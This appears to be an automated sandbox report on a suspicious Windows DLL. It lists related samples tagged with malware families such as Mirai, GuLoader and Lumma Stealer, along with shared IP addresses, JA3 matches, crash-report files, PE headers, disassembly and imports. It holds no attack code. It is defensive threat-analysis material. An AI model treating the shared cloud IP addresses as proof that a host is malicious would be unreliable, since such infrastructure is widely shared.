                              setup.msiGet hashmaliciousAteraAgentBrowse
                              • 108.158.75.12
                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 18.180.43.133
                              sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 34.212.245.104
                              Last Annual payment.htmGet hashmaliciousPhisherBrowse
                              • 52.16.219.193
                              arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 3.6.240.229
                              arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 13.61.42.195
                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              • 54.245.29.89
                              RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                              • 13.226.2.54
                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                              • 3.124.142.205

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0ePURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              • 34.120.62.213
                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              • 34.120.62.213
                              Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                              • 34.120.62.213
                              Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                              • 34.120.62.213
                              rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                              • 34.120.62.213
                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                              • 34.120.62.213
                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 34.120.62.213
                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 34.120.62.213
                              De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 34.120.62.213
                              fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                              • 34.120.62.213

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_8N8_227981c0f83afa88f5535c5c353a7cf1b92740eb_28fdd4fb_2a385f32-0ed8-4b23-9be9-4cb8a093d60d\Report.wer

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.826332631843729
                              Encrypted:false
                              SSDEEP:96:9xFgxqhinyKy6/sjQ4RvTifntQXIDcQjc6mcEMcw3cXaXz+HbHgSQgJjrlo1zawu:Tqx4iny6/S09iWWjQ5zuiFgZ24lO8u
                              MD5:BE0509AC96341C120FADA8A7C6E6E337
                              SHA1:4CAE6C9A7C5A8CF682C0E2D3427B6F03CE4A577B
                              SHA-256:B5BF11B2B8C6E19634998EE403765A4E32B29535A07184190A43533174EE9A20
                              SHA-512:C4FF4FCCDC82EE5B8F7F9F1EEAC2258866105A4402EE5CC6CBB9CC1537D5F6FCDB5AFFE4F0C267C9B386E8F84D93517E0C5CEC25E744519CA5485868DC9413F2
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.2.4.2.2.7.3.4.8.6.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.2.4.2.3.1.0.9.8.6.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.3.8.5.f.3.2.-.0.e.d.8.-.4.b.2.3.-.9.b.e.9.-.4.c.b.8.a.0.9.3.d.6.0.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.0.8.3.5.3.a.-.1.c.b.8.-.4.f.d.2.-.8.6.9.1.-.2.e.4.d.e.8.3.9.a.2.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.8.N.8.j.6.Q.o.j.H.n...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.8.-.0.0.0.1.-.0.0.1.5.-.6.7.3.5.-.6.2.f.d.2.2.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_8N8_227981c0f83afa88f5535c5c353a7cf1b92740eb_28fdd4fb_74df86cf-c037-4d76-bd86-4dd249360dfd\Report.wer

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.8265494557607604
                              Encrypted:false
                              SSDEEP:96:+PFPhiOyKy4sjQ4RvTifntQXIDcQjc6mcEMcw3cXaXz+HbHgSQgJjrlo1zaw85kQ:cLiOy4S09iWWjQ5zuiFgZ24lO8u
                              MD5:9333F33F3C9056A2329ADD9CC2254E3D
                              SHA1:A29A8D7B10AA90BF2A8F120A35F44D387ECCAC39
                              SHA-256:E28462EFC41A36003500C40798BA6E17F51B6DAFEA09FC83125A0ED49EBC3BEC
                              SHA-512:8787502C82D6D61146896B1B9EF69E9DC6A24D7A7DFCD5BF380D6D876E09EC86A0E19AFC254484648C78B5112141346E069EF284D2EA15874C3DAA6CB9F72968
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.2.4.1.6.3.6.4.8.2.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.2.4.1.6.8.4.9.1.8.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.d.f.8.6.c.f.-.c.0.3.7.-.4.d.7.6.-.b.d.8.6.-.4.d.d.2.4.9.3.6.0.d.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.7.f.e.d.7.f.-.7.9.5.5.-.4.e.2.7.-.9.7.c.6.-.9.b.2.8.9.b.e.2.a.1.b.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.8.N.8.j.6.Q.o.j.H.n...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.e.4.-.0.0.0.1.-.0.0.1.5.-.4.a.4.f.-.c.1.f.9.2.2.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER18D0.tmp.dmp

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:42 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):60566
                              Entropy (8bit):1.6045166485516742
                              Encrypted:false
                              SSDEEP:192:fJMpns7xmoterKOM8Y1MiaVQk+ju+45dryOKtc2ZtmJX:xss7f0FY1MiaUjujYhZtI
                              MD5:7F9ED6FAE126175BA243EED690F81CC2
                              SHA1:509A0F18C4B20393BD34D9501B95DAFE5FA61D3F
                              SHA-256:8C7885E1D987270009843FAC7A90A3673E2EB12EB32AABC3AE233447EA224911
                              SHA-512:8A35C9B7DEC4DE1AE225362A0C997EF0480FD248CBCACE4121DD78A04CB67E88F1753CE990FC5F33C30709D19C5A19C92C86FBCF96FE90701DB12A689C7292DE
                              Malicious:false
                              Preview:MDMP..a..... .........dg.........................................-..........T.......8...........T...........@...V.......................................................................................................eJ......8.......Lw......................T.......H.....dg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER193E.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8762
                              Entropy (8bit):3.704832385894897
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJuSE4XTe6YQ8Ogmfk5fpra89b+cuGflAKm:R6lXJDu6YbOgmfk5R+Mfl8
                              MD5:F3E6753B3E9FF46E47B8F740A2424EED
                              SHA1:48975288480172BC332A50F1B350121EDAD8DA47
                              SHA-256:3E3DE0A8F40B226D889B5464FB1094D25565942D4AAEE766C2B9DE9E732E492E
                              SHA-512:8BDA5B6377084DE57ECA7D9AD9D869915DDC91FCC19D2C1A710700F90B21F63F4AEAA0A59D84A685E4781D864D1DDB5C497C5605C71350B7C2DFA198023A3B0B
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.8.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER196E.tmp.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4754
                              Entropy (8bit):4.497674272661293
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsMtJg771I9E3WpW8VYHYm8M4JC1CdxBFHyq85mZGneptSTSDwMDd:uIjfyI7nG7VrJfr7ZpoOLDd
                              MD5:86D69188C88FE29A352194A84E55D367
                              SHA1:9379F5B22F5B21235BF9D4902C0B99ACFCE6EA4E
                              SHA-256:009425CA813F40792C12306C15AD2789C92E6837E246A54614EB24233767D0D7
                              SHA-512:C6AEC7DDB773541F8839B2BCF2F1EDECC12315316CE69D20806AF8FCE89E1564B770B9B7978D77CEF2299DF9FDA38BA6AE6101D0D9A306FBDDC35EFC1F773D0A
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8774
                              Entropy (8bit):3.706456305023809
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJ2UXH6Y7VjVygmfk5fprH89bNmuGfPvm:R6lXJdX6YJpygmfk5KNGf2
                              MD5:9B11969EC42671AE03FB36D6354F4A58
                              SHA1:1D54B8876976FD26EDF3187F52B4AE428FBD1600
                              SHA-256:BBC97830BDBFF324E323F72354EA4D29EADBB063192CD1A006850697A7792BDE
                              SHA-512:E2F20AD4A9105DFF7D1CD97C2EEFEF1DB44E3925114297DAA891FB280834A4CE6D0435DB1B8FC2A4957D9F56F872B84B8AE04EEC7A80530C05E9FE107E363C60
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.6.0.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5.tmp.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4754
                              Entropy (8bit):4.499610788658855
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsMtJg771I9E3WpW8VYyYm8M4JC1CdxBFEyq85mZGTptSTS3d:uIjfyI7nG7VuJfQ70poO3d
                              MD5:980890EF126A684AB56E20AED12B1050
                              SHA1:053A7DB1DB393CFF2621778708B8EEE1BF17851D
                              SHA-256:E13AA29DA0F5B69E33F0D68CF6A19C14A6963DACA0FE0D9B83C37F5C2919ADC4
                              SHA-512:CF9A37470D7BFE24E1C15B6EDDDF56D4817950449726871D68ECCED736AE087551D34858581817D75EA853500161C5553B1714DE9BFC69F590CA3DD610FB7EBF
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFD9.tmp.dmp

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:36 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):69198
                              Entropy (8bit):1.5376480818652762
                              Encrypted:false
                              SSDEEP:192:pfRnbIARlp2iOM8YHlMEzYODoD+RFe5PEvA1PtNbDZ:fnbbYFYFMEzYURW/bV
                              MD5:1A8B4AAC743E3C0643755D618038701D
                              SHA1:76830AD084EE9211331A71073337F3C001BC22FB
                              SHA-256:1E10469ACAB350F81D7D3FAF0065A6ED44A883727F779A4B9DA6C0A3A68BE3A2
                              SHA-512:5516D7075F3219C0B5C16792563C16F13DE57EEC7EE29569D4ED9BC4D0AFD5933BB128102D5C6FC29234C429955C544983F5C7B3A1B1A957BB1D0B4334E24DC0
                              Malicious:false
                              Preview:MDMP..a..... .........dg....................................$....2..........T.......8...........T...........@...........................................................................................................eJ......h.......Lw......................T.............dg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\appcompat\Programs\Amcache.hve

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.469514622390272
                              Encrypted:false
                              SSDEEP:6144:jzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNMjDH5S:fZHtYZWOKnMM6bFpaj4
                              MD5:3D6D63D9B3FCD105A3B9F37C1515EA5B
                              SHA1:B4463F6F5DCB8EBD91152B72D5C1DBC47516D048
                              SHA-256:450E36D15FF4AB9F6AC491AAE43B2E2A56A67764F9EC12C65784318D687D3FD7
                              SHA-512:7E77F2E0D7CA1E5966E9D228927A4D821B3F4A96EFC178377AA6773474BC575E84CEDBD6C4962F3E9675F9936F8AFF0ABE01515078820392807C741D101B7B46
                              Malicious:false
                              Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.0.."R..............................................................................................................................................................................................................................................................................................................................................2...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Entropy (8bit):6.401808042340704
                              TrID:
                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                              • Win64 Executable (generic) (12005/4) 10.17%
                              • Generic Win/DOS Executable (2004/3) 1.70%
                              • DOS Executable Generic (2002/1) 1.70%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                              File name:8N8j6QojHn.dll
                              File size:3'645'790 bytes
                              MD5:78b199f0a4f453fc8a4a05d05695e91e
                              SHA1:6ad0ec9ca2464af8c9cddf6d8959850c7e106f2f
                              SHA256:7f675bb692afe3b8f6dcb4bd533de73e871f167e884c98a04453ec16da0e59dd
                              SHA512:fb189d535a99f5548d92b391c2273040ddd6d61528daac4e4b92a9da14bc0a41c1e9bcf6d6f0d96122945d73c3ef995f7e08d671bb690c14052262ad8fa567b6
                              SSDEEP:49152:Lg4eSTLnnStKQlAtCITgJL77D6nMTABbVfPoNyiClmE+S/iCz7g2:l/fptPTi65+S/ie02
                              TLSH:E8F51903E613089CC03AD1B497977932BA31BC494335BAFF5AC45B222F56BE07A79749
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..NX|.NX|.NX|.. ..GX|.. y..X|.. x.CX|.^...GX|.^.x.@X|.^.y.oX|.. }.LX|..-}.SX|.NX}.pY|.NX|..Y|...|.OX|.....OX|...~.OX|.RichNX|

                              File Icon

                              Icon Hash:7ae282899bbab082

                              Static PE Info

                              General

                              Entrypoint:0x1802bfbc0
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x180000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x672B7282 [Wed Nov 6 13:43:30 2024 UTC]
                              TLS Callbacks:0x802916a0, 0x1
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:1a26f8d82312018d551f2e0028c5eb49

                              Authenticode Signature

                              Signature Valid:
                              Signature Issuer:
                              Signature Validation Error:
                              Error Number:
                              Not Before, Not After
                                Subject Chain
                                  Version:
                                  Thumbprint MD5:
                                  Thumbprint SHA-1:
                                  Thumbprint SHA-256:
                                  Serial:

                                  Entrypoint Preview

                                  Instruction
                                  dec eax
                                  mov dword ptr [esp+08h], ebx
                                  dec eax
                                  mov dword ptr [esp+10h], esi
                                  push edi
                                  dec eax
                                  sub esp, 20h
                                  dec ecx
                                  mov edi, eax
                                  mov ebx, edx
                                  dec eax
                                  mov esi, ecx
                                  cmp edx, 01h
                                  jne 00007F9320AF6487h
                                  call 00007F9320AF64A4h
                                  dec esp
                                  mov eax, edi
                                  mov edx, ebx
                                  dec eax
                                  mov ecx, esi
                                  dec eax
                                  mov ebx, dword ptr [esp+30h]
                                  dec eax
                                  mov esi, dword ptr [esp+38h]
                                  dec eax
                                  add esp, 20h
                                  pop edi
                                  jmp 00007F9320AF6320h
                                  int3
                                  int3
                                  int3
                                  dec eax
                                  mov dword ptr [esp+18h], ebx
                                  push ebp
                                  dec eax
                                  mov ebp, esp
                                  dec eax
                                  sub esp, 30h
                                  dec eax
                                  mov eax, dword ptr [000ADBECh]
                                  dec eax
                                  mov ebx, 2DDFA232h
                                  cdq
                                  sub eax, dword ptr [eax]
                                  add byte ptr [eax+3Bh], cl
                                  ret
                                  jne 00007F9320AF64F6h
                                  dec eax
                                  and dword ptr [ebp+10h], 00000000h
                                  dec eax
                                  lea ecx, dword ptr [ebp+10h]
                                  call dword ptr [0001D69Eh]
                                  dec eax
                                  mov eax, dword ptr [ebp+10h]
                                  dec eax
                                  mov dword ptr [ebp-10h], eax
                                  call dword ptr [0001D698h]
                                  mov eax, eax
                                  dec eax
                                  xor dword ptr [ebp-10h], eax
                                  call dword ptr [0001D4FCh]
                                  mov eax, eax
                                  dec eax
                                  lea ecx, dword ptr [ebp+18h]
                                  dec eax
                                  xor dword ptr [ebp-10h], eax
                                  call dword ptr [0001D7F4h]
                                  mov eax, dword ptr [ebp+18h]
                                  dec eax
                                  lea ecx, dword ptr [ebp-10h]
                                  dec eax
                                  shl eax, 20h
                                  dec eax
                                  xor eax, dword ptr [ebp+18h]
                                  dec eax
                                  xor eax, dword ptr [ebp-10h]
                                  dec eax
                                  xor eax, ecx
                                  dec eax
                                  mov ecx, FFFFFFFFh

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x36a8f00x78.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x36a9680x118.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x37b0000x3f0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3700000xa104.pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x3794000xd40
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x37c0000x2e60.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3669200x54.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x366b000x28.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3667e00x140.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x2dd0000x6e8.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x2db0400x2db200eb89e6117e562f42dee0472f1e93f28aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x2dd0000x8f2360x8f4005f7686d6b36ddb2236ec8c754c35b634False0.4832910667539267data6.032330304078537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x36d0000x26e00x1400abecdfb9703961d2506dffebe3630ad3False0.159765625data2.1126320736313366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .pdata0x3700000xa1040xa2000ed626b7ebecc3bdc355d551f00abe86False0.5114052854938271data6.006328827673415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0x37b0000x3f00x40091081ec536ee22308130ad5ac40a2000False0.4658203125data4.228310792125718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x37c0000x2e600x300006eaa847943e10b2cc7f5eb457c31ed8False0.344970703125data5.409227767100945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0x37b0a00x1a0dataEnglishUnited States0.49759615384615385
                                  RT_MANIFEST0x37b2400x1afXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5359628770301624

                                  Imports

                                  DLLImport
                                  bcryptprimitives.dllProcessPrng
                                  api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                                  ws2_32.dllgetsockname, getpeername, WSASocketW, bind, connect, listen, getsockopt, shutdown, recv, send, WSASend, setsockopt, WSAIoctl, WSAStartup, accept, socket, WSACleanup, WSAGetLastError, freeaddrinfo, ioctlsocket, closesocket, getaddrinfo
